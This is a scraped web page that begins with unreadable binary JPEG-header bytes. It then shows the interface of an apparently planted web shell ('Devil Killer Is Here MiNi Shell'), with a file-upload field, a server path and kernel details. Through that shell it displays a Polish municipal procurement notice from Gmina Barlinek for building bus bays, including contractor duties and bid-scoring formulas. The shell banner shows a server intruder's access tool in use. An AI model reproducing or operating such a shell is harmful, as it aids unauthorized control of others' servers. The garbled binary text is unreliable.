JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221007/0038252201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi – budowa zatok autobusowych <br/>przy ul. Niepodległości – Rynek w Barlinku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BARLINEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210967047</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Niepodległości 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Barlinek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 746 24 50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@barlinek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.barlinek.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi – budowa zatok autobusowych <br/>przy ul. Niepodległości – Rynek w Barlinku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-23515098-4621-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00382522</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00030797/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Przebudowa ul. Niepodległości - uspokojenie ruchu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/barlinek <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu strony internetowej https://platformazakupowa.pl/ pod adresem<br/>https://platformazakupowa.pl/pn/barlinek</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie PZP, odbywa się przy użyciu środków<br/>komunikacji elektronicznej. Poprzez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w<br/>ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. W postępowaniu o udzielenie zamówienia publicznego<br/>sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 poz. 2452). Instrukcja składania ofert oraz sposobu komunikowania się Zamawiającego z Wykonawcami,<br/>zwana dalej<br/>„instrukcją”, jest integralną częścią https://platformazakupowa.pl/ i dostępna jest na stronie dotyczącej prowadzonego postępowania.<br/>Składanie oświadczeń, zawiadomień oraz przekazywanie informacji (np. zadawanie pytań, uzupełnianie oświadczeń lub<br/>dokumentów na wezwanie Zamawiającego) odbywa się elektronicznie za pośrednictwem strony internetowe<br/>https://platformazakupowa.pl/pn/barlinek i formularza „Wyślij wiadomość” dostępnego na stronie prowadzonego postępowania. Za<br/>datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem<br/>https://platformazakupowa.pl/pn/barlinek poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po którym pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego. Oświadczenia lub dokumenty przekazywane za pośrednictwem<br/>środka komunikacji elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na podstawie § 2 ust. 1 i 2<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc<br/>.xls .jpg (.jpeg) ze szczególnym wskazaniem na pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie<br/>jednego w formatów: .zip .7Z. Pozostałe szczegóły dotyczące wymagań technicznych i organizacyjnych zawiera rozdział 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej: „RODO”) Zamawiający informuje, iż:<br/>a) administratorem Pani/Pana danych osobowych jest Gmina Barlinek, ul. Niepodległości 20, 74-320 Barlinek tel. 95 746 55 58; FAX:<br/>95 746 17 04, e-mail: umig@barlinek.pl,<br/>b) administratorem danych osobowych w Gminie Barlinek jest Dariusz Zieliński – Burmistrz Barlinka,<br/>c) administrator wyznaczył Inspektora Ochrony Danych Osobowych - p. Robert Józefowicz, z którym w sprawach dotyczących<br/>przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@barlinek.pl.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły dotyczące RODO zawiera rozdział 22 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RID.VIII.271.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa drogi – budowa zatok autobusowych wraz z przebudową chodnika i montażem<br/>lamp oświetleniowych w nowej lokalizacji przy ul Niepodległości – Rynek w Barlinku. Teren objęty pracami znajduje się w<br/>centrum miasta Barlinek. Odcinek ulicy Niepodległości objęty niniejszym opracowaniem, jest ciągiem komunikacyjnym o<br/>istotnym znaczeniu dla miasta . Planowana przebudowa ma odciążyć ruch autobusowy odbywający się po ulicy Rynek , co<br/>zwiększy bezpieczeństwo ruchu pieszego w tej części miasta, ułatwi komunikację mieszkańców po przez budowę dwóch<br/>zatok autobusowych – w dwóch kierunkach.<br/>Zakres rzeczowy przedmiotu zamówienia obejmuje m.in.:<br/>1) w zakresie ul. Niepodległości:<br/>a) wykonanie dwóch zatok autobusowych,<br/>b) przebudowę ciągów pieszych ,<br/>c) przebudowę przejścia dla pieszych,<br/>d) przebudowę oświetlenia z linią zasilającą,<br/>e) przesunięcie lamp doświetlających przejście dla pieszych ,<br/>f) przebudowę instalacji teletechnicznej,<br/>g) malowanie przejścia dla pieszych,<br/>2) w zakresie ul. Rynek:<br/>a) przebudowa skrzyżowania z ul. Niepodległości (zabruki – kostka starobruk dopasować do istniejącej kostki),<br/>b) likwidacja zatoki autobusowej – wykonanie miejsc postojowych,<br/>c) wykonanie malowania miejsc postojowych i przejścia dla pieszych,<br/>d) regulacja wpustu deszczowego,<br/>3) w zakresie przebudowy infrastruktury elektrycznej ENEA Oświetlenie Sp. z o.o.:<br/>a) obsługa geodezyjna tj. wytyczenie i powykonawczy operat geodezyjny,<br/>b) przygotowanie trasy tj. ręczne rozebranie nawierzchni chodnikowej (po za zakresem budowy zatoczki), ręczne i<br/>mechaniczne kopanie rowów kablowych, wykonanie przecisku z zaciągnięciem rury przepustowej, wykonanie podsypki<br/>piaskowej,<br/>c) wykonanie uziomu dla słupów oświetlenia ulicznego i przejścia dla pieszych tj. ułożenie w rowie kablowym bednarki,<br/>zabicie uziomów pionowych prętowych, połączenie przez spawanie zwodów uziemiających,<br/>d) budowa linii kablowej z zarobieniem końcówek kablowych i podłączeniem pod zaciski w złączach słupowych tj. ułożenie<br/>rur osłonowych DVR50 na wejściu kabli do korpusu słupów, ręczne układanie kabli w rowie kablowym i zaciąganie do rur<br/>osłonowych i przepustowych, wykonanie nadsypki piaskowej i ułożenie folii ostrzegawczej, zarobienie końcówek kabla i<br/>podłączenie pod zaciski w złączach słupowych,<br/>e) montaż i przestawianie słupów oświetlenia ulicznego i przejścia dla pieszych tj. zabudowa fundamentów<br/>prefabrykowanych F160, zabudowa nowego słupa oświetlenia ulicznego na fundamencie, zabudowa nowego wysięgnika na<br/>nowym słupie, zabudowa istniejącej oprawy na nowym wysięgniku (oprawa zdemontowana z kolidującego starego słupa<br/>oświetlenia ulicznego), zaciągniecie nowego kabla wewnątrz słupa i wysięgnika, zarobienie i podłączenie końcówek kabla<br/>pod zaciski w złączu słupowym, zabudowa istniejącego słupa oświetlenia ulicznego na fundamencie (przestawienie<br/>istniejącego słupa z wysięgnikiem, oprawą, okablowaniem wewnętrznym i złączem słupowym), zabudowa istniejących<br/>słupów oświetlenia przejścia dla pieszych bezpośrednio w ziemi (przestawienie istniejących słupów oświetlenia przejścia dla<br/>pieszych z oprawą, okablowaniem wewnętrznym i złączem słupowym),<br/>f) zasypanie wykopu i odtworzenie nawierzchni chodnikowej (po za zakresem budowy zatoczki),<br/>g) pomiary tj. pomiar rezystancji izolacji dla linii kablowych, pomiar skuteczności zerowania, pomiar rezystancji uziemiania,<br/>h) demontaże tj. demontaż do ponownego montażu słupa oświetlenia ulicznego, słupów oświetlenia przejścia dla pieszych,<br/>demontaż do utylizacji słupa oświetlenia ulicznego, demontaż linii kablowej ziemnej i napowietrznej,<br/>i) opracowanie dokumentacji powykonawczej,<br/>4) w zakresie przebudowy infrastruktury telekomunikacyjnej ORANGE POLSKA SA ułożonej pod budowana zatoczką<br/>autobusową w ul. Niepodległości w Barlinku:<br/>a) obsługa geodezyjna tj. wytyczenie i powykonawczy operat geodezyjny,<br/>b) nadzór właścicielski i odbiór końcowy ze strony przedstawiciela gestora sieci,<br/>c) sprawdzenie drożności rur kanalizacji częściowo zajętych i wolnych przed przebudową/zabezpieczeniem ze<br/>sporządzeniem protokołu,<br/>d) przygotowanie trasy tj. ręczne rozebranie nawierzchni chodnikowej (po za zakresem budowy zatoczki),<br/>e) zagłębienie istniejącej kanalizacji oraz rozbudowa przęsła kanalizacji o 2 dodatkowe otwory pod budowaną zatoczką<br/>autobusową,<br/>f) przebudowa studni kablowej tj. rozbiórka istn, korpusu studni i odbudowa studni z bloczków betonowych w rozmiarze<br/>SKR2 z ramą i pokrywą typu ciężkiego w klasie D400 najazdową,<br/>g) sprawdzenie drożności rur kanalizacji częściowo zajętych i wolnych po przebudowie/zagłębieniu ze sporządzeniem<br/>protokołu,<br/>h) zabezpieczenie odcinka kanalizacji kablowej wielootworowej zbrojoną ławą betonową,<br/>i) odtworzenie nawierzchni chodnikowej (po za zakresem budowy zatoczki),<br/>j) opracowanie dokumentacji powykonawczej.<br/>Szczegółowy Opis Przedmiotu Zamówienia zakres robót oraz warunki wykonania stanowią załączniki do SWZ:<br/>a) Projekt techniczny – Przebudowa drogi - Budowa zatok autobusowych, ul. Niepodległości – Rynek w Barlinku – branży:<br/>budowlanej, elektrycznej, telekomunikacyjnej - załącznik nr 10 do SWZ,<br/>b) Decyzja nr 134/2022 z dnia 02.02.2022r. Zachodniopomorskiego Wojewódzkiego Konserwatora Zabytków – załącznik nr<br/>10 do SWZ,<br/>c) Projekt stałej organizacji ruchu – załącznik nr 10 do SWZ,<br/>d) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych – branży: budowlanej, elektrycznej,<br/>telekomunikacyjnej – załącznik nr 11 do SWZ,<br/>e) Przedmiary – branży: budowlanej , elektrycznej, telekomunikacyjnej – załącznik nr 12 do SWZ,<br/>W czasie wykonywania robót Wykonawca dostarczy, zainstaluje i będzie obsługiwał wszystkie tymczasowe urządzenia<br/>zabezpieczające takie jak: zapory, światła ostrzegawcze, sygnały, itp., zapewniając w ten sposób bezpieczeństwo pojazdów<br/>i pieszych. Wykonawca zapewni stałe warunki widoczności w dzień i w nocy tych zapór i znaków, dla których jest to<br/>nieodzowne ze względów bezpieczeństwa. Wszystkie znaki, zapory i inne urządzenia zabezpieczające będą akceptowane<br/>przez Inspektora. Fakt przystąpienia do robót Wykonawca obwieści publicznie przed ich rozpoczęciem w sposób<br/>uzgodniony z Inspektorem oraz przez umieszczenie, w miejscach i ilościach określonych przez Inspektora, tablic<br/>informacyjnych, których treść będzie zatwierdzona przez Inspektora. Tablice informacyjne będą utrzymywane przez<br/>Wykonawcę w dobrym stanie przez cały okres realizacji robót. W okresie trwania budowy i wykańczania robót Wykonawca<br/>będzie:<br/>a) utrzymywać teren budowy i wykopy w stanie bez wody stojącej,<br/>b) podejmować wszelkie uzasadnione kroki mające na celu stosowanie się do przepisów i norm dotyczących ochrony<br/>środowiska na terenie i wokół terenu budowy oraz będzie unikać uszkodzeń lub uciążliwości dla osób lub własności<br/>społecznej i innych, a wynikających ze skażenia, hałasu lub innych przyczyn powstałych w następstwie jego sposobu<br/>działania.<br/>Wykonawca ma obowiązek:<br/>a) materiały, pochodzące z rozbiórek magazynować w wydzielonych do tego miejscach i zagospodarować w sposób<br/>bezpieczny dla środowiska,<br/>b) starannie sprawdzać stan techniczny pracujących maszyn budowlanych i transportowych, by nie było wycieków<br/>ropopochodnych do podłoża.<br/>Wykonawca odpowiada za ochronę instalacji na powierzchni ziemi i za urządzenia podziemne, takie jak rurociągi, kable itp.<br/>oraz uzyska od odpowiednich instytucji będących właścicielami tych urządzeń potwierdzenie informacji dostarczonych mu<br/>przez Zamawiającego w ramach planu ich lokalizacji. Wykonawca zapewni właściwe oznaczenie i zabezpieczenie przed<br/>uszkodzeniem tych instalacji i urządzeń w czasie trwania budowy.<br/>Wykonawca zobowiązany jest umieścić w swoim harmonogramie rezerwę czasową dla wszelkiego rodzaju robót, które mają<br/>być wykonane w zakresie przełożenia instalacji i urządzeń podziemnych na terenie budowy i powiadomić Inspektora o<br/>zamiarze rozpoczęcia robót. O fakcie przypadkowego uszkodzenia tych instalacji Wykonawca bezzwłocznie powiadomi<br/>Inspektora oraz będzie z nimi współpracował dostarczając wszelkiej pomocy potrzebnej przy dokonywaniu napraw.<br/>Wykonawca będzie odpowiadać za wszelkie spowodowane przez jego działania uszkodzenia instalacji na powierzchni ziemi<br/>i urządzeń podziemnych wykazanych w dokumentach dostarczonych mu przez Zamawiającego. Wymaga się aby<br/>przygotowanie i wykonywanie robót budowlanych nie powodowało zakłóceń dojazdu do poszczególnych posesji<br/>przylegających do placu budowy. Wykonawca jest zobowiązany do prowadzenia prac z zapewnieniem przejazdu przez ulice<br/>i ciągi pieszo-jezdne znajdujące się wokół placu budowy. Elementy z demontażu, w tym kostka brukowa (polbruk),<br/>krawężniki , ławki pozostaje własnością Zamawiającego. Należy je złożyć na paletach, w miejscu przez niego wskazanym<br/>zlokalizowanym z odległości nie większej niż 3 km od placu budowy. Do zadań Wykonawcy należy również załadowanie i<br/>rozładowanie przewożonych elementów. Pozostałe materiały pozyskane z rozbiórek Wykonawca zobowiązany jest<br/>zagospodarować zgodnie z obowiązującymi przepisami w tym ustawą o odpadach oraz ustawą o czystości i porządku w<br/>gminach. Zamawiający zaleca przeprowadzenie wizji lokalnej przed złożeniem oferty. Zalecenie przeprowadzenia wizji<br/>lokalnej nie jest wymogiem jej odbycia przed złożeniem oferty w rozumieniu art. 131 ust. 2 w zw. z art. 226 ust. 1 pkt 18 PZP<br/>- oferta bez odbycia wizji nie zostanie odrzucona. Umówienie terminu wizji lokalnej należy dokonać co najmniej na 4 dni<br/>przed ostatecznym terminem składania ofert. W czasie wizji lokalnej Zamawiający nie będzie udzielał wiążących odpowiedzi<br/>na pytania Wykonawcy, wnioski o wyjaśnienie treści SWZ należy składać w trybie określonym ustawą PZP. Zamawiający<br/>nie pokrywa kosztów związanych z przeprowadzeniem wizji lokalnej. W sprawie ustalenia terminu wizji lokalnej należy<br/>skontaktować się z Janusz Zubyk w godzinach 8-14 Nr tel. 95/7465560 e-mail inwestycje@barlinek.pl </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1 Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące<br/>kryteria oceny ofert:<br/>1) Cena brutto (C) 60 %<br/>2) Okres gwarancji (G) 40 %<br/>Maksymalna liczba punktów w kryteriach równa jest określonej wadze dla tych kryteriów w %.<br/>2 Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1. W ramach kryterium „Cena brutto” oceniana będzie cena łączna brutto podana w formularzu oferty.<br/>W ramach kryterium „Cena brutto” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn C = ------------ x 60 % x 100 pkt Co gdzie: C – liczba punktów w ramach kryterium „Cena brutto”, Cn - najniższa cena spośród<br/>ofert ocenianych Co - cena oferty ocenianej<br/>2. W ramach kryterium „Okres gwarancji” oceniany będzie Okres gwarancji na wykonane roboty budowlanej licząc od dnia odbioru<br/>końcowego przedmiotu umowy. Do oceny w ramach kryterium zostanie przyjęty Okres gwarancji zawarty w formularzu oferty. Okres<br/>gwarancji należy podać w miesiącach. Wykonawca nie może zaoferować Okresu gwarancji krótszego niż 48 miesięcy. Maksymalny<br/>Okres Gwarancji przyjęty do oceny ofert wyniesie 60 miesięcy, co oznacza, że w przypadku zaoferowania Okresu Gwarancji na<br/>okres dłuższy niż 60 miesięcy do oceny w ramach kryterium oceny ofert przyjęte zostanie 60-miesięczny Okres Gwarancji. Podanie<br/>przez Wykonawcę krótszego okresu gwarancji niż 48 miesięcy skutkować będzie odrzuceniem oferty. W przypadku braku podania w<br/>ofercie Okresu Gwarancji, Zamawiający uzna, że Wykonawca zapewnia minimalną długość okresu gwarancji wymaganą przez<br/>Zamawiającego.<br/>W ramach kryterium „Okres Gwarancji” sposób przyznania punktów będzie dokonany przy zastosowaniu wzoru:<br/>Go G = ------------ x 40 % x 100 pkt Gn<br/>gdzie: G – liczba punktów w ramach kryterium „Okres Gwarancji”, Gn – najdłuższy zaoferowany Okres Gwarancji, Go – Okres<br/>Gwarancji oferty ocenianej.<br/>3 Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów wyliczoną zgodnie ze wzorem: O = C +<br/>G gdzie: O – całkowita liczba punktów C- punkty uzyskane w kryterium „Cena brutto” G – punkty uzyskane w kryterium „Okres<br/>gwarancji” Oferta może uzyskać maksymalnie 100 punktów.<br/>4 Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert 